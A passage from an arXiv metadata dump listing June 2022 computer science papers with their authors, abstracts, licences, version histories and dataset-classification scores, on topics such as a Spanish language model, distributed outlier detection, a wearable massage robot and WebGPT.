"created": "Wed, 18 May 2022 14:40:44 GMT"
},
{
"version": "v2",
"created": "Fri, 3 Jun 2022 06:19:26 GMT"
}
] | 2022-06-06T00:00:00 |
[
[
"Zhao",
"Ying",
""
]
] |
new_dataset
| 0.980908 |
2205.10233
|
Alejandro Vaca Serrano
|
Alejandro Vaca Serrano, Guillem Garcia Subies, Helena Montoro
Zamorano, Nuria Aldama Garcia, Doaa Samy, David Betancur Sanchez, Antonio
Moreno Sandoval, Marta Guerrero Nieto, Alvaro Barbero Jimenez
|
RigoBERTa: A State-of-the-Art Language Model For Spanish
| null | null | null | null |
cs.CL
|
http://creativecommons.org/licenses/by/4.0/
|
This paper presents RigoBERTa, a State-of-the-Art Language Model for Spanish.
RigoBERTa is trained over a well-curated corpus formed up from different
subcorpora with key features. It follows the DeBERTa architecture, which has
several advantages over other architectures of similar size as BERT or RoBERTa.
RigoBERTa performance is assessed over 13 NLU tasks in comparison with other
available Spanish language models, namely, MarIA, BERTIN and BETO. RigoBERTa
outperformed the three models in 10 out of the 13 tasks, achieving new
"State-of-the-Art" results.
|
[
{
"version": "v1",
"created": "Wed, 27 Apr 2022 11:53:25 GMT"
},
{
"version": "v2",
"created": "Thu, 2 Jun 2022 11:23:51 GMT"
},
{
"version": "v3",
"created": "Fri, 3 Jun 2022 07:09:45 GMT"
}
] | 2022-06-06T00:00:00 |
[
[
"Serrano",
"Alejandro Vaca",
""
],
[
"Subies",
"Guillem Garcia",
""
],
[
"Zamorano",
"Helena Montoro",
""
],
[
"Garcia",
"Nuria Aldama",
""
],
[
"Samy",
"Doaa",
""
],
[
"Sanchez",
"David Betancur",
""
],
[
"Sandoval",
"Antonio Moreno",
""
],
[
"Nieto",
"Marta Guerrero",
""
],
[
"Jimenez",
"Alvaro Barbero",
""
]
] |
new_dataset
| 0.978813 |
2206.01281
|
Leman Akoglu
|
Sean Zhang, Varun Ursekar, Leman Akoglu
|
Sparx: Distributed Outlier Detection at Scale
|
11 pages, 7 figures, 14 tables
|
ACK SIGKDD 2022
|
10.1145/3534678.3539076
| null |
cs.DC cs.DB
|
http://creativecommons.org/licenses/by-nc-sa/4.0/
|
There is no shortage of outlier detection (OD) algorithms in the literature,
yet a vast body of them are designed for a single machine. With the increasing
reality of already cloud-resident datasets comes the need for distributed OD
techniques. This area, however, is not only understudied but also short of
public-domain implementations for practical use. This paper aims to fill this
gap: We design Sparx, a data-parallel OD algorithm suitable for shared-nothing
infrastructures, which we specifically implement in Apache Spark. Through
extensive experiments on three real-world datasets, with several billions of
points and millions of features, we show that existing open-source solutions
fail to scale up; either by large number of points or high dimensionality,
whereas Sparx yields scalable and effective performance. To facilitate
practical use of OD on modern-scale datasets, we open-source Sparx under the
Apache license at https://tinyurl.com/sparx2022.
|
[
{
"version": "v1",
"created": "Thu, 2 Jun 2022 20:09:47 GMT"
}
] | 2022-06-06T00:00:00 |
[
[
"Zhang",
"Sean",
""
],
[
"Ursekar",
"Varun",
""
],
[
"Akoglu",
"Leman",
""
]
] |
new_dataset
| 0.991837 |
2206.01309
|
Peixian Liang
|
Peixian Liang, Yizhe Zhang, Yifan Ding, Jianxu Chen, Chinedu S.
Madukoma, Tim Weninger, Joshua D. Shrout, Danny Z. Chen
|
H-EMD: A Hierarchical Earth Mover's Distance Method for Instance
Segmentation
|
Accepted at IEEE Transactions On Medical Imaging (TMI)
| null | null | null |
cs.CV
|
http://creativecommons.org/licenses/by-nc-sa/4.0/
|
Deep learning (DL) based semantic segmentation methods have achieved
excellent performance in biomedical image segmentation, producing high quality
probability maps to allow extraction of rich instance information to facilitate
good instance segmentation. While numerous efforts were put into developing new
DL semantic segmentation models, less attention was paid to a key issue of how
to effectively explore their probability maps to attain the best possible
instance segmentation. We observe that probability maps by DL semantic
segmentation models can be used to generate many possible instance candidates,
and accurate instance segmentation can be achieved by selecting from them a set
of "optimized" candidates as output instances. Further, the generated instance
candidates form a well-behaved hierarchical structure (a forest), which allows
selecting instances in an optimized manner. Hence, we propose a novel
framework, called hierarchical earth mover's distance (H-EMD), for instance
segmentation in biomedical 2D+time videos and 3D images, which judiciously
incorporates consistent instance selection with semantic-segmentation-generated
probability maps. H-EMD contains two main stages. (1) Instance candidate
generation: capturing instance-structured information in probability maps by
generating many instance candidates in a forest structure. (2) Instance
candidate selection: selecting instances from the candidate set for final
instance segmentation. We formulate a key instance selection problem on the
instance candidate forest as an optimization problem based on the earth mover's
distance (EMD), and solve it by integer linear programming. Extensive
experiments on eight biomedical video or 3D datasets demonstrate that H-EMD
consistently boosts DL semantic segmentation models and is highly competitive
with state-of-the-art methods.
|
[
{
"version": "v1",
"created": "Thu, 2 Jun 2022 21:27:27 GMT"
}
] | 2022-06-06T00:00:00 |
[
[
"Liang",
"Peixian",
""
],
[
"Zhang",
"Yizhe",
""
],
[
"Ding",
"Yifan",
""
],
[
"Chen",
"Jianxu",
""
],
[
"Madukoma",
"Chinedu S.",
""
],
[
"Weninger",
"Tim",
""
],
[
"Shrout",
"Joshua D.",
""
],
[
"Chen",
"Danny Z.",
""
]
] |
new_dataset
| 0.969251 |
2206.01339
|
Yon Visell
|
Mengjia Zhu, Adrian Ferstera, Stejara Dinulescu, Nikolas Kastor, Max
Linnander, Elliot W. Hawkes, Yon Visell
|
A peristaltic soft, wearable robot for compression and massage therapy
|
10 pages, 10 figures
| null | null | null |
cs.RO
|
http://creativecommons.org/licenses/by/4.0/
|
Soft robotics is attractive for wearable applications that require conformal
interactions with the human body. Soft wearable robotic garments hold promise
for supplying dynamic compression or massage therapies, such as are applied for
disorders affecting lymphatic and blood circulation. In this paper, we present
a wearable robot capable of supplying dynamic compression and massage therapy
via peristaltic motion of finger-sized soft, fluidic actuators. We show that
this peristaltic wearable robot can supply dynamic compression pressures
exceeding 22 kPa at frequencies of 14 Hz or more, meeting requirements for
compression and massage therapy. A large variety of software-programmable
compression wave patterns can be generated by varying frequency, amplitude,
phase delay, and duration parameters. We first demonstrate the utility of this
peristaltic wearable robot for compression therapy, showing fluid transport in
a laboratory model of the upper limb. We theoretically and empirically identify
driving regimes that optimize fluid transport. We second demonstrate the
utility of this garment for dynamic massage therapy. These findings show the
potential of such a wearable robot for the treatment of several health
disorders associated with lymphatic and blood circulation, such as lymphedema
and blood clots.
|
[
{
"version": "v1",
"created": "Thu, 2 Jun 2022 23:40:11 GMT"
}
] | 2022-06-06T00:00:00 |
[
[
"Zhu",
"Mengjia",
""
],
[
"Ferstera",
"Adrian",
""
],
[
"Dinulescu",
"Stejara",
""
],
[
"Kastor",
"Nikolas",
""
],
[
"Linnander",
"Max",
""
],
[
"Hawkes",
"Elliot W.",
""
],
[
"Visell",
"Yon",
""
]
] |
new_dataset
| 0.999242 |
2206.01365
|
Ivan Bajic
|
Victor A. Mateescu and Ivan V. Baji\'c
|
Adversarial Attacks on Human Vision
|
21 pages, 8 figures, 1 table
|
Extended version of IEEE MultiMedia, vol. 23, no. 1, pp. 82-91,
Jan.-Mar. 2016
|
10.1109/MMUL.2015.59
| null |
cs.CV eess.IV
|
http://creativecommons.org/licenses/by/4.0/
|
This article presents an introduction to visual attention retargeting, its
connection to visual saliency, the challenges associated with it, and ideas for
how it can be approached. The difficulty of attention retargeting as a saliency
inversion problem lies in the lack of one-to-one mapping between saliency and
the image domain, in addition to the possible negative impact of saliency
alterations on image aesthetics. A few approaches from recent literature to
solve this challenging problem are reviewed, and several suggestions for future
development are presented.
|
[
{
"version": "v1",
"created": "Fri, 3 Jun 2022 02:05:04 GMT"
}
] | 2022-06-06T00:00:00 |
[
[
"Mateescu",
"Victor A.",
""
],
[
"Bajić",
"Ivan V.",
""
]
] |
new_dataset
| 0.99796 |
2206.01381
|
Peng Li
|
Qiqi Ding, Peng Li, Xuefeng Yan, Ding Shi, Luming Liang, Weiming Wang,
Haoran Xie, Jonathan Li, Mingqiang Wei
|
CF-YOLO: Cross Fusion YOLO for Object Detection in Adverse Weather with
a High-quality Real Snow Dataset
|
10pages
| null | null | null |
cs.CV
|
http://arxiv.org/licenses/nonexclusive-distrib/1.0/
|
Snow is one of the toughest adverse weather conditions for object detection
(OD). Currently, not only there is a lack of snowy OD datasets to train
cutting-edge detectors, but also these detectors have difficulties learning
latent information beneficial for detection in snow. To alleviate the two above
problems, we first establish a real-world snowy OD dataset, named RSOD.
Besides, we develop an unsupervised training strategy with a distinctive
activation function, called $Peak \ Act$, to quantitatively evaluate the effect
of snow on each object. Peak Act helps grading the images in RSOD into
four-difficulty levels. To our knowledge, RSOD is the first quantitatively
evaluated and graded snowy OD dataset. Then, we propose a novel Cross Fusion
(CF) block to construct a lightweight OD network based on YOLOv5s (call
CF-YOLO). CF is a plug-and-play feature aggregation module, which integrates
the advantages of Feature Pyramid Network and Path Aggregation Network in a
simpler yet more flexible form. Both RSOD and CF lead our CF-YOLO to possess an
optimization ability for OD in real-world snow. That is, CF-YOLO can handle
unfavorable detection problems of vagueness, distortion and covering of snow.
Experiments show that our CF-YOLO achieves better detection results on RSOD,
compared to SOTAs. The code and dataset are available at
https://github.com/qqding77/CF-YOLO-and-RSOD.
|
[
{
"version": "v1",
"created": "Fri, 3 Jun 2022 04:00:26 GMT"
}
] | 2022-06-06T00:00:00 |
[
[
"Ding",
"Qiqi",
""
],
[
"Li",
"Peng",
""
],
[
"Yan",
"Xuefeng",
""
],
[
"Shi",
"Ding",
""
],
[
"Liang",
"Luming",
""
],
[
"Wang",
"Weiming",
""
],
[
"Xie",
"Haoran",
""
],
[
"Li",
"Jonathan",
""
],
[
"Wei",
"Mingqiang",
""
]
] |
new_dataset
| 0.999843 |
2206.01547
|
Animesh Trivedi
|
Nick Tehrany and Animesh Trivedi
|
Understanding NVMe Zoned Namespace (ZNS) Flash SSD Storage Devices
| null | null | null | null |
cs.OS cs.PF
|
http://arxiv.org/licenses/nonexclusive-distrib/1.0/
|
The standardization of NVMe Zoned Namespaces (ZNS) in the NVMe 2.0
specification presents a unique new addition to storage devices. Unlike
traditional SSDs, where the flash media management idiosyncrasies are hidden
behind a flash translation layer (FTL) inside the device, ZNS devices push
certain operations regarding data placement and garbage collection out from the
device to the host. This allows the host to achieve more optimal data placement
and predictable garbage collection overheads, along with lower device write
amplification. Thus, additionally increasing flash media lifetime. As a result,
ZNS devices are gaining significant attention in the research community.
However, with the current software stack there are numerous ways of
integrating ZNS devices into a host system. In this work, we begin to
systematically analyze the integration options, report on the current software
support for ZNS devices in the Linux Kernel, and provide an initial set of
performance measurements. Our main findings show that larger I/O sizes are
required to saturate the ZNS device bandwidth, and configuration of the I/O
scheduler can provide workload dependent performance gains, requiring careful
consideration of ZNS integration and configuration depending on the application
workload and its access patterns. Our dataset and code are available at https:
//github.com/nicktehrany/ZNS-Study.
|
[
{
"version": "v1",
"created": "Fri, 3 Jun 2022 12:54:55 GMT"
}
] | 2022-06-06T00:00:00 |
[
[
"Tehrany",
"Nick",
""
],
[
"Trivedi",
"Animesh",
""
]
] |
new_dataset
| 0.998767 |
2206.01550
|
Mohammed Elkomy Alaa
|
Mohammed ElKomy, Amany M. Sarhan
|
TCE at Qur'an QA 2022: Arabic Language Question Answering Over Holy
Qur'an Using a Post-Processed Ensemble of BERT-based Models
|
OSACT5 workshop, Qur'an QA 2022 Shared Task participation by TCE
| null | null | null |
cs.CL cs.IR
|
http://creativecommons.org/licenses/by/4.0/
|
In recent years, we witnessed great progress in different tasks of natural
language understanding using machine learning. Question answering is one of
these tasks which is used by search engines and social media platforms for
improved user experience. Arabic is the language of the Holy Qur'an; the sacred
text for 1.8 billion people across the world. Arabic is a challenging language
for Natural Language Processing (NLP) due to its complex structures. In this
article, we describe our attempts at OSACT5 Qur'an QA 2022 Shared Task, which
is a question answering challenge on the Holy Qur'an in Arabic. We propose an
ensemble learning model based on Arabic variants of BERT models. In addition,
we perform post-processing to enhance the model predictions. Our system
achieves a Partial Reciprocal Rank (pRR) score of 56.6% on the official test
set.
|
[
{
"version": "v1",
"created": "Fri, 3 Jun 2022 13:00:48 GMT"
}
] | 2022-06-06T00:00:00 |
[
[
"ElKomy",
"Mohammed",
""
],
[
"Sarhan",
"Amany M.",
""
]
] |
new_dataset
| 0.999597 |
2206.01683
|
WenJi Liu
|
Wenji Liu, Kai Bai, Xuming He, Shuran Song, Changxi Zheng, Xiaopei Liu
|
FishGym: A High-Performance Physics-based Simulation Framework for
Underwater Robot Learning
|
8 pages,8 figures
| null | null | null |
cs.RO
|
http://arxiv.org/licenses/nonexclusive-distrib/1.0/
|
Bionic underwater robots have demonstrated their superiority in many
applications. Yet, training their intelligence for a variety of tasks that
mimic the behavior of underwater creatures poses a number of challenges in
practice, mainly due to lack of a large amount of available training data as
well as the high cost in real physical environment. Alternatively, simulation
has been considered as a viable and important tool for acquiring datasets in
different environments, but it mostly targeted rigid and soft body systems.
There is currently dearth of work for more complex fluid systems interacting
with immersed solids that can be efficiently and accurately simulated for robot
training purposes. In this paper, we propose a new platform called "FishGym",
which can be used to train fish-like underwater robots. The framework consists
of a robotic fish modeling module using articulated body with skinning, a
GPU-based high-performance localized two-way coupled fluid-structure
interaction simulation module that handles both finite and infinitely large
domains, as well as a reinforcement learning module. We leveraged existing
training methods with adaptations to underwater fish-like robots and obtained
learned control policies for multiple benchmark tasks. The training results are
demonstrated with reasonable motion trajectories, with comparisons and analyses
to empirical models as well as known real fish swimming behaviors to highlight
the advantages of the proposed platform.
|
[
{
"version": "v1",
"created": "Fri, 3 Jun 2022 16:57:31 GMT"
}
] | 2022-06-06T00:00:00 |
[
[
"Liu",
"Wenji",
""
],
[
"Bai",
"Kai",
""
],
[
"He",
"Xuming",
""
],
[
"Song",
"Shuran",
""
],
[
"Zheng",
"Changxi",
""
],
[
"Liu",
"Xiaopei",
""
]
] |
new_dataset
| 0.99886 |
2206.01718
|
Roozbeh Mottaghi
|
Dustin Schwenk, Apoorv Khandelwal, Christopher Clark, Kenneth Marino,
Roozbeh Mottaghi
|
A-OKVQA: A Benchmark for Visual Question Answering using World Knowledge
| null | null | null | null |
cs.CV cs.CL
|
http://arxiv.org/licenses/nonexclusive-distrib/1.0/
|
The Visual Question Answering (VQA) task aspires to provide a meaningful
testbed for the development of AI models that can jointly reason over visual
and natural language inputs. Despite a proliferation of VQA datasets, this goal
is hindered by a set of common limitations. These include a reliance on
relatively simplistic questions that are repetitive in both concepts and
linguistic structure, little world knowledge needed outside of the paired
image, and limited reasoning required to arrive at the correct answer. We
introduce A-OKVQA, a crowdsourced dataset composed of a diverse set of about
25K questions requiring a broad base of commonsense and world knowledge to
answer. In contrast to the existing knowledge-based VQA datasets, the questions
generally cannot be answered by simply querying a knowledge base, and instead
require some form of commonsense reasoning about the scene depicted in the
image. We demonstrate the potential of this new dataset through a detailed
analysis of its contents and baseline performance measurements over a variety
of state-of-the-art vision-language models. Project page:
http://a-okvqa.allenai.org/
|
[
{
"version": "v1",
"created": "Fri, 3 Jun 2022 17:52:27 GMT"
}
] | 2022-06-06T00:00:00 |
[
[
"Schwenk",
"Dustin",
""
],
[
"Khandelwal",
"Apoorv",
""
],
[
"Clark",
"Christopher",
""
],
[
"Marino",
"Kenneth",
""
],
[
"Mottaghi",
"Roozbeh",
""
]
] |
new_dataset
| 0.999448 |
2101.02120
|
Dennis Soemers
|
\'Eric Piette, Cameron Browne and Dennis J. N. J. Soemers
|
Ludii Game Logic Guide
| null | null | null | null |
cs.AI
|
http://arxiv.org/licenses/nonexclusive-distrib/1.0/
|
This technical report outlines the fundamental workings of the game logic
behind Ludii, a general game system, that can be used to play a wide variety of
games. Ludii is a program developed for the ERC-funded Digital Ludeme Project,
in which mathematical and computational approaches are used to study how games
were played, and spread, throughout history. This report explains how general
game states and equipment are represented in Ludii, and how the rule ludemes
dictating play are implemented behind the scenes, giving some insight into the
core game logic behind the Ludii general game player. This guide is intended to
help game designers using the Ludii game description language to understand it
more completely and make fuller use of its features when describing their
games.
|
[
{
"version": "v1",
"created": "Wed, 6 Jan 2021 16:22:37 GMT"
},
{
"version": "v2",
"created": "Thu, 2 Jun 2022 13:06:50 GMT"
}
] | 2022-06-03T00:00:00 |
[
[
"Piette",
"Éric",
""
],
[
"Browne",
"Cameron",
""
],
[
"Soemers",
"Dennis J. N. J.",
""
]
] |
new_dataset
| 0.999765 |
2112.09332
|
Jacob Hilton
|
Reiichiro Nakano, Jacob Hilton, Suchir Balaji, Jeff Wu, Long Ouyang,
Christina Kim, Christopher Hesse, Shantanu Jain, Vineet Kosaraju, William
Saunders, Xu Jiang, Karl Cobbe, Tyna Eloundou, Gretchen Krueger, Kevin
Button, Matthew Knight, Benjamin Chess, John Schulman
|
WebGPT: Browser-assisted question-answering with human feedback
|
32 pages
| null | null | null |
cs.CL cs.AI cs.LG
|
http://arxiv.org/licenses/nonexclusive-distrib/1.0/
|
We fine-tune GPT-3 to answer long-form questions using a text-based
web-browsing environment, which allows the model to search and navigate the
web. By setting up the task so that it can be performed by humans, we are able
to train models on the task using imitation learning, and then optimize answer
quality with human feedback. To make human evaluation of factual accuracy
easier, models must collect references while browsing in support of their
answers. We train and evaluate our models on ELI5, a dataset of questions asked
by Reddit users. Our best model is obtained by fine-tuning GPT-3 using behavior
cloning, and then performing rejection sampling against a reward model trained
to predict human preferences. This model's answers are preferred by humans 56%
of the time to those of our human demonstrators, and 69% of the time to the
highest-voted answer from Reddit.
|
[
{
"version": "v1",
"created": "Fri, 17 Dec 2021 05:43:43 GMT"
},
{
"version": "v2",
"created": "Sat, 12 Mar 2022 22:49:16 GMT"
},
{
"version": "v3",
"created": "Wed, 1 Jun 2022 19:08:11 GMT"
}
] | 2022-06-03T00:00:00 |
[
[
"Nakano",
"Reiichiro",
""
],
[
"Hilton",
"Jacob",
""
],
[
"Balaji",
"Suchir",
""
],
[
"Wu",
"Jeff",
""
],
[
"Ouyang",
"Long",
""
],
[
"Kim",
"Christina",
""
],
[
"Hesse",
"Christopher",
""
],
[
"Jain",
"Shantanu",
""
],
[
"Kosaraju",
"Vineet",
""
],
[
"Saunders",
"William",
""
],
[
"Jiang",
"Xu",
""
],
[
"Cobbe",
"Karl",
""
],
[
"Eloundou",
"Tyna",
""
],
[
"Krueger",
"Gretchen",
""
],
[
"Button",
"Kevin",
""
],
[
"Knight",
"Matthew",
""
],
[
"Chess",
"Benjamin",
""
],
[
"Schulman",
"John",
""
]
] |
new_dataset
| 0.966531 |
2112.13985
|
Shoya Matsumori
|
Shoya Matsumori, Yuki Abe, Kosuke Shingyouchi, Komei Sugiura, and
Michita Imai
|
LatteGAN: Visually Guided Language Attention for Multi-Turn
Text-Conditioned Image Manipulation
| null |
IEEE Access, 9, 160521-160532 (2021)
|
10.1109/ACCESS.2021.3129215
| null |
cs.CV
|
http://creativecommons.org/licenses/by-nc-nd/4.0/
|
Text-guided image manipulation tasks have recently gained attention in the
vision-and-language community. While most of the prior studies focused on
single-turn manipulation, our goal in this paper is to address the more
challenging multi-turn image manipulation (MTIM) task. Previous models for this
task successfully generate images iteratively, given a sequence of instructions
and a previously generated image. However, this approach suffers from
under-generation and a lack of generated quality of the objects that are
described in the instructions, which consequently degrades the overall
performance. To overcome these problems, we present a novel architecture called
a Visually Guided Language Attention GAN (LatteGAN). Here, we address the
limitations of the previous approaches by introducing a Visually Guided
Language Attention (Latte) module, which extracts fine-grained text
representations for the generator, and a Text-Conditioned U-Net discriminator
architecture, which discriminates both the global and local representations of
fake or real images. Extensive experiments on two distinct MTIM datasets,
CoDraw and i-CLEVR, demonstrate the state-of-the-art performance of the
proposed model.
|
[
{
"version": "v1",
"created": "Tue, 28 Dec 2021 03:50:03 GMT"
},
{
"version": "v2",
"created": "Thu, 2 Jun 2022 10:14:38 GMT"
}
] | 2022-06-03T00:00:00 |
[
[
"Matsumori",
"Shoya",
""
],
[
"Abe",
"Yuki",
""
],
[
"Shingyouchi",
"Kosuke",
""
],
[
"Sugiura",
"Komei",
""
],
[
"Imai",
"Michita",
""
]
] |
new_dataset
| 0.998837 |
2204.05009
|
Beno\^it Denkinger
|
Beno\^it Walter Denkinger, Miguel Pe\'on-Quir\'os, Mario Konijnenburg,
David Atienza, Francky Catthoor
|
VWR2A: A Very-Wide-Register Reconfigurable-Array Architecture for
Low-Power Embedded Devices
| null | null | null | null |
cs.AR
|
http://creativecommons.org/licenses/by/4.0/
|
Edge-computing requires high-performance energy-efficient embedded systems.
Fixed-function or custom accelerators, such as FFT or FIR filter engines, are
very efficient at implementing a particular functionality for a given set of
constraints. However, they are inflexible when facing application-wide
optimizations or functionality upgrades. Conversely, programmable cores offer
higher flexibility, but often with a penalty in area, performance, and, above
all, energy consumption. In this paper, we propose VWR2A, an architecture that
integrates high computational density and low power memory structures (i.e.,
very-wide registers and scratchpad memories). VWR2A narrows the energy gap with
similar or better performance on FFT kernels with respect to an FFT
accelerator. Moreover, VWR2A flexibility allows to accelerate multiple kernels,
resulting in significant energy savings at the application level.
|
[
{
"version": "v1",
"created": "Mon, 11 Apr 2022 11:15:36 GMT"
},
{
"version": "v2",
"created": "Thu, 14 Apr 2022 12:35:32 GMT"
},
{
"version": "v3",
"created": "Thu, 2 Jun 2022 07:16:13 GMT"
}
] | 2022-06-03T00:00:00 |
[
[
"Denkinger",
"Benoît Walter",
""
],
[
"Peón-Quirós",
"Miguel",
""
],
[
"Konijnenburg",
"Mario",
""
],
[
"Atienza",
"David",
""
],
[
"Catthoor",
"Francky",
""
]
] |
new_dataset
| 0.999655 |
2206.00777
|
Luca Carlone
|
Luca Carlone, Kasra Khosoussi, Vasileios Tzoumas, Golnaz Habibi,
Markus Ryll, Rajat Talak, Jingnan Shi, Pasquale Antonante
|
Visual Navigation for Autonomous Vehicles: An Open-source Hands-on
Robotics Course at MIT
|
This paper has been accepted for publication at the IEEE Integrated
STEM Education Conference
| null | null | null |
cs.RO
|
http://arxiv.org/licenses/nonexclusive-distrib/1.0/
|
This paper reports on the development, execution, and open-sourcing of a new
robotics course at MIT. The course is a modern take on "Visual Navigation for
Autonomous Vehicles" (VNAV) and targets first-year graduate students and senior
undergraduates with prior exposure to robotics. VNAV has the goal of preparing
the students to perform research in robotics and vision-based navigation, with
emphasis on drones and self-driving cars. The course spans the entire
autonomous navigation pipeline; as such, it covers a broad set of topics,
including geometric control and trajectory optimization, 2D and 3D computer
vision, visual and visual-inertial odometry, place recognition, simultaneous
localization and mapping, and geometric deep learning for perception. VNAV has
three key features. First, it bridges traditional computer vision and robotics
courses by exposing the challenges that are specific to embodied intelligence,
e.g., limited computation and need for just-in-time and robust perception to
close the loop over control and decision making. Second, it strikes a balance
between depth and breadth by combining rigorous technical notes (including
topics that are less explored in typical robotics courses, e.g., on-manifold
optimization) with slides and videos showcasing the latest research results.
Third, it provides a compelling approach to hands-on robotics education by
leveraging a physical drone platform (mostly suitable for small residential
courses) and a photo-realistic Unity-based simulator (open-source and scalable
to large online courses). VNAV has been offered at MIT in the Falls of
2018-2021 and is now publicly available on MIT OpenCourseWare (OCW).
|
[
{
"version": "v1",
"created": "Wed, 1 Jun 2022 21:40:35 GMT"
}
] | 2022-06-03T00:00:00 |
[
[
"Carlone",
"Luca",
""
],
[
"Khosoussi",
"Kasra",
""
],
[
"Tzoumas",
"Vasileios",
""
],
[
"Habibi",
"Golnaz",
""
],
[
"Ryll",
"Markus",
""
],
[
"Talak",
"Rajat",
""
],
[
"Shi",
"Jingnan",
""
],
[
"Antonante",
"Pasquale",
""
]
] |
new_dataset
| 0.971746 |
2206.00800
|
Li Niu
|
Haoxu Huang, Li Niu
|
CcHarmony: Color-checker based Image Harmonization Dataset
| null | null | null | null |
cs.CV
|
http://creativecommons.org/publicdomain/zero/1.0/
|
Image harmonization targets at adjusting the foreground in a composite image
to make it compatible with the background, producing a more realistic and
harmonious image. Training deep image harmonization network requires abundant
training data, but it is extremely difficult to acquire training pairs of
composite images and ground-truth harmonious images. Therefore, existing works
turn to adjust the foreground appearance in a real image to create a synthetic
composite image. However, such adjustment may not faithfully reflect the
natural illumination change of foreground. In this work, we explore a novel
transitive way to construct image harmonization dataset. Specifically, based on
the existing datasets with recorded illumination information, we first convert
the foreground in a real image to the standard illumination condition, and then
convert it to another illumination condition, which is combined with the
original background to form a synthetic composite image. In this manner, we
construct an image harmonization dataset called ccHarmony, which is named after
color checker (cc). The dataset is available at
https://github.com/bcmi/Image-Harmonization-Dataset-ccHarmony.
|
[
{
"version": "v1",
"created": "Wed, 1 Jun 2022 23:57:16 GMT"
}
] | 2022-06-03T00:00:00 |
[
[
"Huang",
"Haoxu",
""
],
[
"Niu",
"Li",
""
]
] |
new_dataset
| 0.990252 |
2206.00827
|
Bin Li
|
Bin Li, Jiaqi Gu and Huazi Zhang
|
Universal Polar Coding for Parallel Gaussian Channels with Non-Binary
Inputs and Its Applications to HARQ and MIMO
| null | null | null | null |
cs.IT math.IT
|
http://creativecommons.org/licenses/by-nc-sa/4.0/
|
In this paper, we first propose an universal polar coding scheme for parallel
Gaussian channels with non-binary inputs. It is assumed that the encoder knows
only the sum capacity of M parallel channels instead of the capacity of any
single channel. By decomposing each parallel channel into T = [log2r] sub
channels, we therefore obtain MT binary sub-channels. A super polar coding
scheme that across all sub-channels is then proposed. This scheme can achieve
the sum capacity when the block length is sufficiently large. We have also
discussed the applications of parallel polar coding design for both the HARQ
and MIMO systems. It is shown that a capacity-achieving HARQ scheme can be
obtained for block fading channel and a capacity-achieving MIMO design that
requires only the feedback of the sum rate of all MIMO layers can also be
attained.
|
[
{
"version": "v1",
"created": "Thu, 2 Jun 2022 01:55:28 GMT"
}
] | 2022-06-03T00:00:00 |
[
[
"Li",
"Bin",
""
],
[
"Gu",
"Jiaqi",
""
],
[
"Zhang",
"Huazi",
""
]
] |
new_dataset
| 0.98546 |
2206.00847
|
Sajad Sotudeh
|
Sajad Sotudeh, Nazli Goharian
|
TSTR: Too Short to Represent, Summarize with Details! Intro-Guided
Extended Summary Generation
|
9 pages, NAACL 2022 Long Paper
| null | null | null |
cs.CL
|
http://creativecommons.org/licenses/by/4.0/
|
Many scientific papers such as those in arXiv and PubMed data collections
have abstracts with varying lengths of 50-1000 words and average length of
approximately 200 words, where longer abstracts typically convey more
information about the source paper. Up to recently, scientific summarization
research has typically focused on generating short, abstract-like summaries
following the existing datasets used for scientific summarization. In domains
where the source text is relatively long-form, such as in scientific documents,
such summary is not able to go beyond the general and coarse overview and
provide salient information from the source document. The recent interest to
tackle this problem motivated curation of scientific datasets, arXiv-Long and
PubMed-Long, containing human-written summaries of 400-600 words, hence,
providing a venue for research in generating long/extended summaries. Extended
summaries facilitate a faster read while providing details beyond coarse
information. In this paper, we propose TSTR, an extractive summarizer that
utilizes the introductory information of documents as pointers to their salient
information. The evaluations on two existing large-scale extended summarization
datasets indicate statistically significant improvement in terms of Rouge and
average Rouge (F1) scores (except in one case) as compared to strong baselines
and state-of-the-art. Comprehensive human evaluations favor our generated
extended summaries in terms of cohesion and completeness.
|
[
{
"version": "v1",
"created": "Thu, 2 Jun 2022 02:45:31 GMT"
}
] | 2022-06-03T00:00:00 |
[
[
"Sotudeh",
"Sajad",
""
],
[
"Goharian",
"Nazli",
""
]
] |
new_dataset
| 0.998568 |
2206.00906
|
Aleksandr Nesterov
|
Aleksandr Nesterov, Bulat Ibragimov, Dmitriy Umerenkov, Artem
Shelmanov, Galina Zubkova and Vladimir Kokh
|
NeuralSympCheck: A Symptom Checking and Disease Diagnostic Neural Model
with Logic Regularization
|
Published in the proceedings of the conference "Artificial
Intelligence in Medicine 2022"
| null | null | null |
cs.CL cs.AI cs.HC cs.NE
|
http://creativecommons.org/licenses/by/4.0/
|
The symptom checking systems inquire users for their symptoms and perform a
rapid and affordable medical assessment of their condition. The basic symptom
checking systems based on Bayesian methods, decision trees, or information gain
methods are easy to train and do not require significant computational
resources. However, their drawbacks are low relevance of proposed symptoms and
insufficient quality of diagnostics. The best results on these tasks are
achieved by reinforcement learning models. Their weaknesses are the difficulty
of developing and training such systems and limited applicability to cases with
large and sparse decision spaces. We propose a new approach based on the
supervised learning of neural models with logic regularization that combines
the advantages of the different methods. Our experiments on real and synthetic
data show that the proposed approach outperforms the best existing methods in
the accuracy of diagnosis when the number of diagnoses and symptoms is large.
|
[
{
"version": "v1",
"created": "Thu, 2 Jun 2022 07:57:17 GMT"
}
] | 2022-06-03T00:00:00 |
[
[
"Nesterov",
"Aleksandr",
""
],
[
"Ibragimov",
"Bulat",
""
],
[
"Umerenkov",
"Dmitriy",
""
],
[
"Shelmanov",
"Artem",
""
],
[
"Zubkova",
"Galina",
""
],
[
"Kokh",
"Vladimir",
""
]
] |
new_dataset
| 0.965537 |
2206.00929
|
Peter Rupnik
|
Michal Mochtak, Peter Rupnik, Nikola Ljube\v{s}i\v{c}
|
The ParlaSent-BCS dataset of sentiment-annotated parliamentary debates
from Bosnia-Herzegovina, Croatia, and Serbia
|
8 pages, submitted to JT-DH 2022 (Language Technologies and Digital
Humanities 2022) conference, number 4293
| null | null | null |
cs.CL
|
http://creativecommons.org/licenses/by-sa/4.0/
|
Expression of sentiment in parliamentary debates is deemed to be
significantly different from that on social media or in product reviews. This
paper adds to an emerging body of research on parliamentary debates with a
dataset of sentences annotated for detection sentiment polarity in political
discourse. We sample the sentences for annotation from the proceedings of three
Southeast European parliaments: Croatia, Bosnia-Herzegovina, and Serbia. A
six-level schema is applied to the data with the aim of training a
classification model for the detection of sentiment in parliamentary
proceedings. Krippendorff's alpha measuring the inter-annotator agreement
ranges from 0.6 for the six-level annotation schema to 0.75 for the three-level
schema and 0.83 for the two-level schema. Our initial experiments on the
dataset show that transformer models perform significantly better than those
using a simpler architecture. Furthermore, regardless of the similarity of the
three languages, we observe differences in performance across different
languages. Performing parliament-specific training and evaluation shows that
the main reason for the differing performance between parliaments seems to be
the different complexity of the automatic classification task, which is not
